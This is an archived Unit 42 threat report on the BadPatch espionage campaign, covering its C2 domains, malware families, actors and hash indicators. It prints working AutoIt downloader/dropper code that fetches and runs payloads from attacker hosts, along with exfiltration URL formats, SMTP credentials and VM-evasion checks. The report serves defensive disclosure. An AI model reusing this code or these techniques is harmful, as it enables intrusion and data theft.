{
	"id": "8b0a1c40-ab65-436f-9a7b-758d5064650c",
	"created_at": "2026-04-06T01:30:54.345757Z",
	"updated_at": "2026-04-10T03:23:51.477053Z",
	"deleted_at": null,
	"sha1_hash": "236ea5241550bfc164e1d4a70df418046bcb5dc9",
	"title": "BadPatch",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2859385,
	"plain_text": "BadPatch\r\nBy Tomer Bar, Simon Conant\r\nPublished: 2017-10-20 · Archived: 2026-04-06 00:46:55 UTC\r\nIntroduction\r\nIn April 2017, in collaboration with Clearsky, Palo Alto Networks Unit 42 published an article about our research into\r\ntargeted attacks in the Middle East. In that research we discussed two new malware families we named KASPERAGENT\r\nand MICROPSIA.\r\nSince then, we have continued our research into the Command and Control (C2) infrastructure associated with\r\nKASPERAGENT and MICROPSIA. This ongoing research led us to a new Middle Eastern campaign. Our findings from\r\nthis new campaign include C2 infrastructure, new attack methods, four types of malware (including Android malware), a\r\nsystem for management of stolen victim data and some details of the actors.\r\nIt is notable that our research has shown that this newly-identified attack campaign dates back to at least June 2012, over\r\nfive years ago.\r\nIn this blog, we outline the results of our research into this new campaign so far.\r\nFinding the New Campaign\r\nOur discovery of this new campaign begins where our previous KASPERAGENT and MICROPSIA research left off.\r\nPivoting from Previous KASPERAGENT and MICROPSIA Research\r\nOne of the C2 servers we observed in our earlier KASPERAGENT and MICROPSIA research was mailsinfo[.]com. The\r\nfirst IP address that this domain resolved to, from about mid-May 2015 through October-November 2015, was\r\n148.251.135[.]117.\r\nWe used passive DNS (pDNS) and found the server mail.pal4u[.]net on 148.251.135[.]117 starting mid-May 2015. We also\r\nfound other servers on this IP address. We do not believe this necessarily gives a link between campaigns found on this IP\r\naddress, as it appears to be shared by multiple unrelated third parties. 
However, the nature of activity and some malware\r\nartifacts on this IP address do suggest a possible link to the Gaza Hackers group.\r\nC2 Infrastructure\r\nFollowing our leads from the previous KASPERAGENT and MICROPSIA research and digging into the server\r\nmail.pal4u[.]net on 148.251.135[.]117 led us to the C2 infrastructure of this new campaign.\r\nDigging into Pal4u\r\nThe WHOIS for pal4u[.]net appears to be a Palestinian hosting company. The DNS records for pal4u[.]net give us, in\r\naddition to the “WWW” hostname, the Name Servers (NS) “NS1” and “NS2” and an additional IP address, 195.154.216[.]74.\r\nWe found six additional domains that used pal4u[.]net as NS, and which all shared the same historic IP address\r\n195.154.216[.]74 (Figure 2). Of the seven total domains, we observed six as malware Command \u0026 Control (C2),\r\nexfiltration, malware download servers, and/or in associated malware code:\r\nPal4u[.]net\r\nPal2me[.]net\r\nPay2earn[.]net\r\nShop8d[.]net\r\nTs4shope[.]net\r\npal4news[.]net\r\nOnly one of the seven domains associated with this IP, ads4market[.]net, was not associated with malware activity. 
We\r\ndid not find any legitimate activity or content associated with these six domains during the period of their registration.\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 1 of 16\n\nFigure 1- C2 domain links\r\nWhile there is historic WHOIS for pal2me[.]net and shop8d[.]net, research into the registrant information suggests this is\r\nrelated to the ISP rather than to the actors using the site for C2.\r\nWe also found the DNS RNAME “a.faris.live[.]com” was used, but this also seems to be related to the host ISP rather than\r\nthe site owner.\r\nUnderstanding that we were looking at a collection of linked malware C2 servers, we started to look into the attack\r\nmethods and malware that used this infrastructure.\r\nAttack Methods\r\nThe initial attacks we observed using this infrastructure were delivered to victims via spear phishing. However, for the first time in\r\nany known Gaza Hackers-linked campaign, we also found limited use of vulnerability exploits – the RTF exploit CVE-2012-0158\r\ndocumented by Citizenlab (Part 3 – “The Curious Case of the Shared Exploit”). 
The attackers used the RTF exploit to\r\ndownload their “BadPatch” Windows malware from the hacked WordPress site wp.piedslibres[.]com/wp/wp-includes/js/Next.scr.\r\nSHA256 d759dcbebee18a65fda434ba1da5d348c16d9d3775fe1652a1dacf983ffc93b8\r\nFirst seen 2015-05-13\r\nFilename المستجدات.doc (Developments.doc)\r\nWe found a second attack sample that used the same exploit and also downloaded the same malware from the compromised\r\nserver.\r\nSHA256 6660491190525a7413b683b91a6c8b0082aa71e6dd6291d11ec26e1e3cf55a57\r\nFirst seen 2015-06-15\r\nFilename تسنيم.doc (Tasneem.doc – the military organization of Fatah (political Palestinian movement))\r\nIn most of the attacks we observed, the malware displays a blank Microsoft Word decoy file, or a Microsoft Word file\r\nwith the error message:\r\n\"An error occurred, please try your request again later\".\r\nWe did observe some variations in this attack. The first malware sample that we identified (compiled on 12 June 2012)\r\ndropped an Adobe Flash decoy file (Figure 2):\r\nSHA256 92a685c0c8515ef55635760026039564ddd0b299a2b0c4812df3c40aba133812\r\nFigure 2- Adobe Flash decoy\r\nSamples typically employ decoy filenames tailored to the spear-phished target:\r\nSHA256 30282a807c2ee27b0d1dda310e41487f5018bc5fc5df8af6c13d08df34f2b6df\r\nFilename عاجل جدا وسري جدا.gz (Very urgent and very confidential.gz)\r\nSHA256 cc8020c36156c7e5c8cfbbb32bc8d7f03536510f4e3b38b22e0abdb9ad90c90e\r\nFilename اسماء المستحقين للمالية.scr (The names of the beneficiaries of Finance. 
scr)\r\nSHA256 1a65e43afaaff90b4124cbef21fadc319f10fba4843d09837219400b0dbcc285\r\nFilename الهباش يتحدى حماس الاعتراف.scr (Habash defies Hamas recognition.scr)\r\nSHA256 2c64a3d6b896ee1b58b9cf55531b7256de45025d60b1f4be764b385de087b52f\r\nFilename Statement of Account-ARABBANK.exe\r\nMalware Analysis\r\nWe collected 148 malware samples in this campaign, using the C2 servers that we identified, and grouped them into four\r\ncategories:\r\n1. Microsoft Visual Basic malware – exfiltrates data via SMTP (port 26) and HTTP.\r\n2. AutoIt malware – early versions also used SMTP for exfiltration, but mainly HTTP.\r\n3. AutoIt downloader \u0026 dropper (downloads and executes the AutoIt malware)\r\n4. Android malware – exfiltration via HTTP (first seen December 2015)\r\nMicrosoft Visual Basic malware\r\nUpon infection the malware copies itself to %appdata%\\microsoft\\microsoft [0-9]{9,15}\\dwm.exe (the directory name “Microsoft” is\r\nfollowed by 9-15 digits), and adds a link to the malware executable in the startup folder for persistence.\r\nThese variants include system information collection (operating system, computer name), keylogger output, and browser\r\npassword collection from Internet Explorer, Chrome and Firefox.\r\nKeylogger and system info exfiltration is done via HTTP POST:\r\nlms/getdata.php?myAction=add_line\u0026macName=…$\u0026computer_id=App.EXEName\u0026mac_address=…\r\n\u0026dns_domain=nnn\u0026domain=bbb\u0026content2=$FRESH:%20%20ESC%20pango2012ENTR\u0026ver=3\u0026mac_time=tt\u0026patch_user_id=mgh2\u0026patch_group_i\r\nFile exfiltration is done via SMTP on port 26, with the SMTP credentials hardcoded (encrypted) in the malware code. Some\r\nmailbox examples:\r\nuser: sender_b@pal4u[.]net\r\npassword: sender@123\r\nubuntu_net@pal4u[.]net\r\nubuntu_send@pal4u[.]net\r\nFigure 3- SMTP encryption settings\r\nThe list of files for exfiltration is written to the malware folder as “sysfiles.txt”. 
A file “1.done” is generated with content\r\n\"done\" after successful exfiltration. The file “mac.txt” contains the computer's MAC address. Some versions exfiltrate recent\r\nfiles; others collect and exfiltrate files matching a hardcoded extension list:\r\n*.xls;*.xlsx;*.pdf;*.mdb;*.rar;*.zip*.doc;*.docx\r\nAutoIt Malware\r\nWe observed a shift from Visual Basic to AutoIt malware in this campaign around March 2016. AutoIt is a freeware\r\nBASIC-like scripting language designed for automating the Windows GUI and general-purpose scripting.\r\nThis malware achieves persistence by writing to \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Microsoft.lnk\"\r\nusing the WScript object.\r\nIt attempts to detect whether it is being run in a Virtual Machine (VM) using process checks and WMI queries for the disk drive name, BIOS, and\r\nmotherboard:\r\n1. Checks for the processes \"VBoxService.exe\", \"VBoxTray.exe\", \"VMwareTray.exe\"\r\n2. WMI query on Win32_DiskDrive, looking for \"VBOX HARDDISK\", \"QEMU HARDDISK\", \"VMWARE VIRTUAL IDE HARD DRIVE\",\r\n\"VMware Virtual S SCSI Disk Device\"\r\n3. WMI query on Win32_BIOS: \"Found Vbox BIOS version\"\r\n4. 
WMI query on Win32_Baseboard: \"Found VMware-style motherboard\", \"440BX Desktop Reference Platform\",\r\nName=\"Base Board\"\r\nThe malware deletes Chrome and Firefox cached password files, requiring the user to re-enter site passwords and affording the\r\nkeylogger the opportunity to capture them.\r\nThe malware can be instructed to kill the malware process by Process ID or by hardcoded name.\r\nIt can update itself by downloading and executing a newer version:\r\nh__p://m103.pay2earn[.]net/public/versions/[\"svchost\" \u0026 $i \u0026 \".zip\"] (where i=1 to 7).\r\nThe new version is saved at %appdata%\\Microsoft\\updte\\svchost.scr.\r\nEnvironment data exfiltration via POST\r\nIt performs a WMI query to enumerate installed security products.\r\nIt stores data in log files:\r\nThe specific attacker username is stored at %appdata%\\Microsoft\\updte\\usu.log\r\nThe MAC address is stored at %appdata%\\Microsoft\\updte\\mac.log\r\nErrors are logged at %appdata%\\Microsoft\\updte\\log.log\r\nThis data is exfiltrated along with the Operating System version and architecture using HTTP POST:\r\nh__p://m103.pay2earn[.]net/devices/settings\r\n/devices/settings?mac_address=\r\n\u003cmacAddress\u003e\u0026content=%20Start%20Downloader%20majdTest%201/2017Anti%20Type:%20%20%20OS%20Version%20=%20WIN_7%20|%20X64\r\nh__p://m103.pay2earn[.]net/logs/new\r\n/logs/new?name=\u003ccomputerName\u003e$\u0026computer_id=App.EXEName\u0026mac_address=\r\n\u003cmacAddress\u003e\u0026content=$%20Start%20Downloader%20%20majdTest%201/2017\u0026patch_username=majd\r\nScreenshots via SMTP\r\nThe malware takes screenshots on the victim computer, exfiltrating them using SMTP (port 26) as “GDIPlus_Image1.jpg”\r\nand “GDIPlus_Image2.jpg”.\r\nThe SMTP configuration is saved as RC4-encrypted strings, decrypted with the password !@#$%^\u0026*()\r\nFigure 4- SMTP RC4 encrypted strings init\r\nMail is sent, in this example, using the string \"Start Downloader 
majdTest 1/2017\".\r\nFigure 5- SMTP mail sending function\r\nThe emails are sent from an email address at the C2 server to a recipient address on the same server. Decrypted example:\r\nsmtpserver:  m103.pay2earn[.]net\r\nfromname:    sn@m103.pay2earn[.]net\r\nfromaddress: sn@m103.pay2earn[.]net\r\ntoaddress:   asf@m103.pay2earn[.]net\r\nusername:    sn@m103.pay2earn[.]net\r\npassword:    sn_$_2016\r\nWe observed a single variant using an obfuscated AutoIt script\r\n(5c6e531738c1380ec09c1ec0f1438cee5077e6cbade8af87710b8be2f0aaaac7). Another outlier variant was keylogger-only,\r\nsupporting interception of only Arabic and English characters\r\n(42adec426addf3fd0c6aff406b46fa82d901f5a9bed7758a243458961349a362).\r\nAutoIt downloader / dropper\r\nThis simple component downloads and executes malware from the C2 server (e.g. pal4u[.]net or m103.pay2earn[.]net).\r\nSHA256: 2d75335f8c7d4e956dcd637f480c94f6ed49a9870375aad0eee1e651d6e7ac02\r\ngtyu()\r\n_zizi2()\r\nFunc _zizi2()\r\n  ; download the RC4-encrypted archive to a temp file, decrypt it and extract it\r\n  Local $sfilepath = _winapi_gettempfilename(@TempDir)\r\n  Local $hdownload = InetGet(\"h__p://www.pal4u[.]net/zzzzz\", $sfilepath, _\r\n        $inet_forcereload, $inet_downloadbackground)\r\n  Do\r\n    Sleep(250)\r\n  Until InetGetInfo($hdownload, $inet_downloadcomplete)\r\n  InetClose($hdownload)\r\n  Local $ialgorithm = $calg_rc4\r\n  If _crypt_decryptfile($sfilepath, \"F:\\ddd.zip\", \"?\u003e\u003cMNBVCXZ\", $ialgorithm) Then\r\n    Sleep(250)\r\n    Local $zip1 = _ezezez(\"F:\\ddd.rar\", \"F:\\\")\r\n  EndIf\r\nEndFunc\r\nFunc gtyu()\r\n  ; download and decrypt the decoy document, then open it for the victim\r\n  Local $sfilepath = 
_winapi_gettempfilename(@TempDir)\r\n  Local $hdownload = InetGet(\"h__p://www.pal4u[.]net/dddd\", $sfilepath, _\r\n        $inet_forcereload, $inet_downloadbackground)\r\n  Do\r\n    Sleep(250)\r\n  Until InetGetInfo($hdownload, $inet_downloadcomplete)\r\n  InetClose($hdownload)\r\n  Local $ialgorithm = $calg_rc4\r\n  If _crypt_decryptfile($sfilepath, \"F:\\dd.docx\", \"ZXCVBNM\u003c\u003e?\", $ialgorithm) Then\r\n    ShellExecute(\"F:\\dd.docx\")\r\n  EndIf\r\nEndFunc\r\n; extract a zip archive into a destination folder using the Shell.Application COM object\r\nFunc _ezezez($szipfile, $sdestinationfolder, $sfolderstructure = \"\")\r\n  Local $i\r\n  ; pick an unused temporary folder name based on the archive name\r\n  Do\r\n    $i += 1\r\n    $stempzipfolder = @TempDir \u0026 \"\\Temporary Directory \" \u0026 $i \u0026 \" for \" \u0026 _\r\n                      StringRegExpReplace($szipfile, \".*\\\\\", \"\")\r\n  Until NOT FileExists($stempzipfolder)\r\n  Local $oshell = ObjCreate(\"Shell.Application\")\r\n  If NOT IsObj($oshell) Then\r\n    Return SetError(1, 0, 0)\r\n  EndIf\r\n  Local $odestinationfolder = $oshell.namespace($sdestinationfolder)\r\n  If NOT IsObj($odestinationfolder) Then\r\n    DirCreate($sdestinationfolder)\r\n  EndIf\r\n  Local $ooriginfolder = $oshell.namespace($szipfile \u0026 \"\\\" \u0026 $sfolderstructure)\r\n  If NOT IsObj($ooriginfolder) Then\r\n    Return SetError(3, 0, 0)\r\n  EndIf\r\n  Local $ooriginfile = $ooriginfolder.items()\r\n  If NOT IsObj($ooriginfile) Then\r\n    Return SetError(4, 0, 0)\r\n  EndIf\r\n  ; 20 = no progress dialog (4) + answer \"Yes to All\" (16)\r\n  $odestinationfolder.copyhere($ooriginfile, 20)\r\n  DirRemove($stempzipfolder, 1)\r\n  Return 1\r\nEndFunc\r\nThis downloader example also displays a decoy file (bbb.docx):\r\nSHA256: 2d75335f8c7d4e956dcd637f480c94f6ed49a9870375aad0eee1e651d6e7ac02\r\n#NoTrayIcon\r\n$appdate = @AppDataDir\r\nLocal $ifileexists = FileExists(@AppDataDir \u0026 
\"\\bbb.docx\")\r\nIf $ifileexists Then\r\n   FileDelete(@AppDataDir \u0026 \"\\bbb.docx\")\r\nEndIf\r\nDirCreate($appdate \u0026 \"\\Microsoft\\updte\\\")\r\n; drop the decoy document, then install and start the embedded payload if it is not already running\r\nFileInstall(\"bbb.docx\", @AppDataDir \u0026 \"\\bbb.docx\")\r\nIf NOT ProcessExists(\"svchsots.scr\") Then\r\n   FileInstall(\"svchsots.scr\", @AppDataDir \u0026 \"\\Microsoft\\updte\\svchsots.scr\")\r\n   Run(@AppDataDir \u0026 \"\\Microsoft\\updte\\svchsots.scr\")\r\nEndIf\r\nShellExecute(@AppDataDir \u0026 \"\\bbb.docx\")\r\nAndroid Malware\r\nThe actors do not miss the opportunity to also collect data from the Android devices of their targets.\r\nAs well as the typical ability to update the malware, this Android malware collects and exfiltrates device files, SMS\r\nmessages and voice calls, and can also be used to remotely record sound or video using the device. A follow-up blog will\r\nexamine this malware in detail.\r\nRecords Management System and Victims\r\nThe threat actors have developed their own custom system to manage the data exfiltrated from their victims, \"نظام إدارة السجلات\"\r\n(\"Records Management System\"). Server logon requires 2-Factor authentication (2FA).\r\nFigure 6- RMS Logon Screen\r\nFigure 7- RMS SMS 2FA\r\nDuring the course of our research, we observed a newly introduced bug in their authentication. 
Navigating directly to the\r\npage “sms.php” bypassed the initial password entry requirement, taking us directly to the SMS verification page (Figure 6).\r\nFurther, we discovered that navigating directly to “/lms/index.php” no longer redirected the user to login.php, but instead\r\ngranted authenticated access to the system.\r\nFigure 8- Records Management System\r\nThis allowed us to enumerate the victims contacting the exfiltration server (Figure 9) through March 2016.\r\nFigure 9- Victims by country\r\nAs the nature of the campaign would suggest, we observed a small overall number of victims. That the majority of victims appear\r\ndomestic is also not unusual in such campaigns, although we also noted the actor infecting their own test machines in some\r\ncases (Figure 10).\r\nFigure 10- Testing Logs\r\nThe Adversary\r\nWe find some hints in sample filenames, Microsoft Visual Basic project directory names, and HTTP POST parameters, suggesting\r\nthe names of some of the actors involved in this campaign, and a possible link to an official Gaza Bureau.\r\nS:\\sh\\work files from shaaban\\4shopfiles tajas\\shop8d\\Project1.vbp\r\nC:\\Documents and Settings\\HADJYOUB.HADJ-1065B94515\\Bureau\\cm\\Project1.vbp\r\nPossible nickname strings that we observed include:\r\nShaaban, Hadjyoub, OMR, mgh2, rashed, Shady, majd, f2b, jno, ajr, hmg, vip, 2ta, asf, h2m, mag\r\nNaming\r\nThe actors appear to name this malware “Patch”:\r\n\"\\2014-03-17\\exe\\gaza\\Project1.vbp\"\r\nV:\\Batch Versions\\\r\nIn Arabic, “P” and “B” are phonetically similar, leading to common B/P misspellings.\r\nEmbedded strings:\r\n\"Old - update patch and check anti-virus.. 
\"\r\n\"PatchNotExit-- Check Version\"\r\n\"PatchNotExit-- download now\"\r\n\"PatchNotExit-- Version Patch\"\r\nServer communication parameters:\r\nlms/getdata.php?myAction=add_line\u0026macName=…$\u0026computer_id=App.EXEName\u0026mac_address=…\r\n\u0026dns_domain=nnn\u0026domain=bbb\u0026content2=$FRESH:%20%20ESC%20pango2012ENTR\u0026ver=3\u0026mac_time=tt\u0026patch_user_id=mgh2\u0026patch_group\r\nThe “patch_user_id” parameter appears to refer to the individual actor managing this victim.\r\nAge of Campaign\r\nThe oldest sample we observed has a compile date of 12 June 2012. The C2 server linked to that sample, pal2me[.]net, was\r\nalso first registered on the same date. This campaign has been running for more than five years, and continues to this\r\ndate.\r\nDevelopment Over Time\r\nThe oldest sample we observed (above) supported exfiltration of victim data using email (the technique is detailed in the\r\nmalware analysis section):\r\n92a685c0c8515ef55635760026039564ddd0b299a2b0c4812df3c40aba133812\r\nC:\\Users\\Shady\\Desktop\\only email with slide show\\Project1.vbp\r\nKeylogger functionality is introduced:\r\n106deff16a93c4a4624fe96e3274e1432921c56d5a430834775e5b98861c00ea\r\nE:\\work here\\ready kl send recent files\\Project1.vbp\r\nNew keylogger version:\r\n17a4126fb1fb19885d78c82271464d82af8618b7d1b7d8901666c1121ddb2ba1\r\nD:\\000 work\\21.3 GB\\newSpoofKL\\Project1.vbp\r\nNew file exfiltration test version (details are in the malware analysis section):\r\n9a8acd988089e7f9dd04f971374f766db519e854d42e8052b0d98b4c9c6b67e4\r\nY:\\My Work\\VB 6\\Get Files\\GFiles 14-09-2015 - Working tst only\\Project1.vbp\r\nVisual Basic versions, new downloader:\r\n224b5af4ca4de234f03408487f075f0d638826cb6f65944a3e8dcbaac4372e79\r\nQ:\\newPatch\\downloader\\exe site\\shop\\Project1.vbp\r\nDownloader version 
2.8:\r\nd906118fb36a0cc4e83121d4d606ad685645252e8e0791f793057499d8751bf0\r\nJ:\\dowloader 2 8\\downloader\\site\\Project1.vbp\r\nVersion M103, pointing at the currently-live C2 server m103.pay2earn[.]net. The current server registration dates to 8 February\r\n2016; the compile date of this malware was 31 March 2016.\r\nSHA256: d9253c808d83ace06f885479e0807246a29cb9967ea0d0855f5a3802825b13db\r\nW:\\newPatch\\exe vb m103 30 3 2016\\Project1.vbp\r\nConclusion\r\nDiligence in investigating infrastructure associated with a previously documented campaign led us to another, possibly\r\nunrelated, campaign that crossed paths with it in hosting.\r\nThis allowed us to uncover previously unknown C2 and exfiltration infrastructure, associated malware, and the first time\r\nthat we’ve observed this group using exploits.\r\nThe simplicity of the malware and the relative unsophistication of the C2, exfiltration and stolen data management belie the\r\ndemonstrated fact that this very targeted, low-volume campaign has been working fine for these actors for five years, and\r\ncontinues today.\r\nCoverage\r\nPalo Alto Networks customers are protected from this threat in the following ways:\r\n1. WildFire accurately identifies all malware samples related to this operation as malicious.\r\n2. Traps prevents this threat on endpoints, based upon WildFire prevention.\r\n3. 
Domains used by this operation have been flagged as malicious in Threat Prevention.\r\nAutoFocus users can view malware related to this attack using the “BadPatch” tag.\r\nIOCs can be found in the appendices of this report.\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 11 of 16\n\nAppendix I – Hashes\r\n1a0c0a0c74d085d6e90c5d96517926218fc55cc161f5c1e5dbb897f40d1f5164\r\n26e3d2dd7b70701aff8552889c899b7915b06f0b979a4766076681dd01abd978\r\n16c151ffe5e439a9383900738b4f8938cd33ba1781b62d8e2ee0686336a7145c\r\n9a4ed995dfd9d468715dfe4906265059aa3bb1e0d6ceb547e84001661a023a9d\r\nf1e616aecf6205daaf6c55898f86092055fe85a3825837c688c2e7545f6efb7e\r\ndb829b0d7396feaef2a4555b9d4fdf1b00d287dad93585e1c6c54f9cee0e9d4f\r\nabaf5a7d82e6db68fb73af18bf1f5e37b200f04dcc6e34da98ad044d9f411022\r\n04b8b48a795bcfe2b7344c2bbc409e85641e412c35ff490e7ae074e7d48698f7\r\n668b4c01e0493dc2b8b3a1b7134ce3811ef1449c2807ef6ca1c0b8356b90a2ed\r\n342de173d65d604e0935808b1d6a617060602c86e543bdf1c4c650812dec3883\r\n6180311025913c26ff8ac90b57b3fad61e21cdd896ea8b26a5ee14e6e663f6bb\r\n1d2a85a88153061ea17c6eeb9394f1d969ed6f0db526c7ddf79919676d4ca012\r\n3bb663567994bae2da06ea84a75b5205b7fa38dd8253ab326bfa4c50a90939ac\r\n4a1a5456123ef756956cc1d9a53f44dab040421700edf051f21671abe7e61d69\r\n47ecddb2f7f7242a3fd6cf9d08715512644f3ca199e779f737762150765b3027\r\n32667a9bfb24f505f351804d8516e2f5cf7f88ba6ef4de4db4463234ba4a3ea1\r\n68cd91e61a1bd6b5a1f39e45920c887be9603e85ca4e03b156cdc7acbe66f7c7\r\n56904fea473c40b9cf39de854a81896e8ba8f2bc1415101e69c25c065eb9773e\r\n0274e5f807a951cc68c0fd5af3fc9fa7b8a7305609da8144dacf69d0d39a23a4\r\n3ce1ad8a7f90404bdfc8157689742448ff675d094767a10c9cdf1e08ce068c55\r\nacc351ce2d3bf1bacb10bf379c6575fdb98e7c0fc2c69d20a7a7e3cf34615ae1\r\n19c25fa8a43b9da08fb5a78c03c554f23c0635ce618e789296fd35d748603fd4\r\n9e87eff7c42c077486531d6a178cab830c19aa787a18bc7ba5334a682cf82312\r\n1d4d3ad6a1330ada787c11dcf39bcf4864745aa440bfe1a45291f82b5467849f\r\n01d08050e532145ebb08398c51ac387979d34526918b8
b21d0a3d0bed1ba3487\r\nb3847e10df393052222da931a96bedacf6d862e3470256dfb234a93947a23e82\r\n71015d0586123eac15c36aa4747fb60d03e671d5b5b4608818258320e33512e7\r\nc0e24060684d376068acdb40636392eb5627b410f9cb67428008415d288cb7f9\r\n0be090f3b01713a28f5bc94feb41f07ccd2814e0c7a58f5226242f96e80baaec\r\n20d337997e2a79015aa711bda443d2c0248959f15f007ec469839c7fa4418b9b\r\nef6e26502bb160be3154d7a34a461bbbc1bf8eaf3142c64658d14707836badec\r\n40929deab63f001f99973dffe6674e8bf0347f5dc30b5fb2d38e00667b90be7b\r\n584de1b855adaabc329639d09c77512a5f05099ecd629698b04893ac58fba01c\r\n90a86513076a32328e654f241226f454a5b39d76ea1a3119432aa9bb4253f775\r\n799c5a2dd25f180b4d4dda72da8da55bc6a99e2f01068880d7e3b58f8687242a\r\n6bbfd7f427458a485946d09318260cc484191a7d2e6f20dc0c143065716ff378\r\n8c01e58a2523297599342e38b6f8559b67d82bc790963b7a96802f30d337f295\r\nf8b022d3be92bf893b92ea235dd171443ac61330d008a0a786a0af940f2c98a7\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 12 of 16\n\n6ed9b8b0c478e30bc4f25bfcae3652b3937d735457b41146286173c54f3d5779\r\n28fb8f3858df045f3a1979f66ac9793f89f42324fcac8339f9f0fb7e566dbf16\r\n802a39b22dfacdc2325f8a839377c903b4a7957503106ce6f7aed67e824b82c2\r\n224b5af4ca4de234f03408487f075f0d638826cb6f65944a3e8dcbaac4372e79\r\n39655262901bc4a35867fa458a6025aa1175613c57ef51336412c32ca61715a1\r\nd49c16c0aacdb700f5afab86b20640a85c01d31b81c854c6a49eb62b8af68b68\r\n99ea3a10ea564b980a10e969b9b70fdef9be0b53ea4dee331cac7ebbdef65c47\r\na6c0ef11f8d3f12215a9d2d4d461f0eb92f4f305bdd32c2bb3e3a7196f8bb26d\r\n8b322ebd9dfae74c531f70a32b7d5689c394c6e5455575de53cc8984f7ebdbe5\r\n4c3a6c5a8a7a03581bf337dfb7572fb919a7d0414179019836b909e5e40921dc\r\n48845b4d384665b2078b1b4ed55a29fc4b2634e38d2c05ee29fb7a24e5a5c7f2\r\n3984d2400880e2f87f0c0e0e9d8f0e8e4b81971b53f66d840d1733a1cba6ccb1\r\nb9eb60c690b19a13da8717c4ba60e2bf9c4cda92fb9a723bed6011b08ea1b0ca\r\n1b6282350a25f9e362c68d359277746bc5039a0532e05375b06e9688622df6ba\r\nca2e49411ca8c2f8071bc5e12a8266444db7c1a7d0651d9fa9422970024f2150\r\n
5c6e531738c1380ec09c1ec0f1438cee5077e6cbade8af87710b8be2f0aaaac7\r\necd6fa73cf527025792c4f1ee13acbd1c1219217f6da5aed2aaed11ea8453393\r\nfc06a74968ad0db68f26fa5e306a279728617fde7f3b8a8ddfb449f02bbac2c9\r\n934e56b74a5ca093857042c5b0371661134d29ea405d444bd2d602c74c20b9d2\r\n4c4d9e0062225311584fbf25b79e2a5b9a98dc2a3a43e736621082d8a92f18fe\r\n5e1173cc0c8226881a5fa21e6811e96db732c4ee9dfa2d3455c650d4522fe732\r\ne4400d9f128bf9ba924d94f1c87cfe882cc324d607ffdcbb03aaad6cdf71d2ef\r\n1dec4ec17c7bfe5abc9bb0a885e4cc5a2e5ab6a9676bb9f445402b84599ec915\r\n2f9eedcdda4f28ca08ece26a58e859062a6c0b9cf7f319b3eaa8d9f034c76d20\r\nef03d20595daa112f7652a11f2f7c2cac37216dae9bbd1aa87e482fd204c858e\r\n4246159ae6234697ed015c8c222ce053a7eaf83e2960d1c49339e72184be7e40\r\nb9440d29e2104cc3411c71c5db504dbc043c77aee24154ac68409df97c5eff49\r\na33bccaa7d2d3797f25edfae846f1e7757b50633b374f8ce1faf7a5934784817\r\n3c55a81f460804e2e39a1d3dc556fa5a93fe7ce8c139f8b68f1e5ca98f62875c\r\n0a376070679f6a31b2f6aaef23747f930544ab77ad01d30007f6d0ccf2bead60\r\ncdf964200bb9130c09d1bfd17677e2da5808c179a2cd6d49fa32780df1b5b92a\r\n92a685c0c8515ef55635760026039564ddd0b299a2b0c4812df3c40aba133812\r\ne73dd4c69a9a9fedd40c290bad68115e3645e74d1d68af0d7fe77ef7c0c5e875\r\ne7fb8bf35fb9bfa2f20fcc293939aad71d5fc39af36defb5150e2f394bb1500e\r\ncd933c6cc8450135deacd61a51e1b425ff7516cac078b92fe1b6f602e4c39e53\r\n025ab87dc729cbf284104a8c9872b63e486ad8af9aef422906743feb0db04224\r\n42adec426addf3fd0c6aff406b46fa82d901f5a9bed7758a243458961349a362\r\n78301ce0bb93dea81f4d70ebb224cc076e7f1e4c38b65afbbc1ad8d4c4882893\r\n5ea75fcdd2be820efdddc411fce9b6d277b66d3356ab8f79bcf542a4ce9fdfa0\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 13 of 
16\n\nc595e47f8e50e8f0ffdc3258f2dcc9411150c3ea00709341c6d4e42d578e46ae\r\n201642c6d1341127aa0137e20db8a3d2da0412fb06ff14eae0c61f6174a44045\r\nfedf49896daa893608deaec7b36a4acb8fbedf7363788c35a6c0431ad0fadca9\r\n22ff8ce9840bae9c9c9aa107e689ec287abb93d585a469c442b295146b9c10c2\r\n30aa9b1c18bb494a01817b5fc0f7418efe2022e7335e815d96dcb8c1fe63e8e8\r\n830cb27f0c584d55267a4e0f6ddcb00c53ce1906946f5d490a26729d38d12057\r\n7370c81abf55a39918a537d1e49a51d74df2042883d11062383038367c864087\r\nd9253c808d83ace06f885479e0807246a29cb9967ea0d0855f5a3802825b13db\r\nffea93677d1c404900ea5ba20631625ea2e28a22c3af02155c747f2f25429885\r\na25abe1c21bec0c0259270aa2333ee1d1b6a327a356f5434c42558143a252afe\r\nce606c710aa001b09f0b51b78bf8675d8b1be4d99714b1a3b9ca245865fec508\r\n98f57b4693bbe9d469821f5433004edafe6ddf8964fa1ef1465ee73fbce24e0c\r\n18c84b6f7e58b2867ec6f3e7c7998ac6901fd485d503d32c8fabff93744574d1\r\n9b2c33764252c2bf807c837d80bffc21eeab87e7129c2d3e9b9b7a1eeee2de84\r\n24a9c57bb4cbb3d1b89c4e7affad599d431de4f007d4c54a4da25a8a2ba4f116\r\n17a4126fb1fb19885d78c82271464d82af8618b7d1b7d8901666c1121ddb2ba1\r\n278dba3857367824fc2d693b7d96cef4f06cb7fdc52260b1c804b9c90d43646d\r\n2d75335f8c7d4e956dcd637f480c94f6ed49a9870375aad0eee1e651d6e7ac02\r\n5b84e8ad40e018b5d87a464e67173eebe2b268e816d9bb864f1d0f1441bebc7c\r\nf52e47c6b0916655d7e8868bd79904e8825fdf98624d8c42192cae808543b0a5\r\nc4f0ec52ce768f2ba36e4954e2afca3ef7ef46d757070a861cc6609d256a3fe1\r\n3d59703fb58265b07ae1cb26750baba733e304f5540a6824329b7ff6f7ab3efe\r\nb02585dd5399047daf3bccd9d7ed5cc69b0fc23b4709e9270c9f09f67c0a23bc\r\nd18e84f86d7a8cfd246baa1684517d69e411780f9da6b8e3ddb99a61c8d0947a\r\nc4fd31ab40e6cb2ebf75d5dc81045ebc38a8825def3f1696a539c32e5ec5b353\r\n9c6b8eb7c007abc681ceb67da5b1c7533055bb9985236abb46ec6f7e0b14e03e\r\nf1e8a5cb9c019dd649564efe4157a90a6f980fd1f0f75c596f20c02e08462373\r\n8443d7bbd02bed691ba1ce55ea0660601c5f10256cbfafd410de41ab2cd4d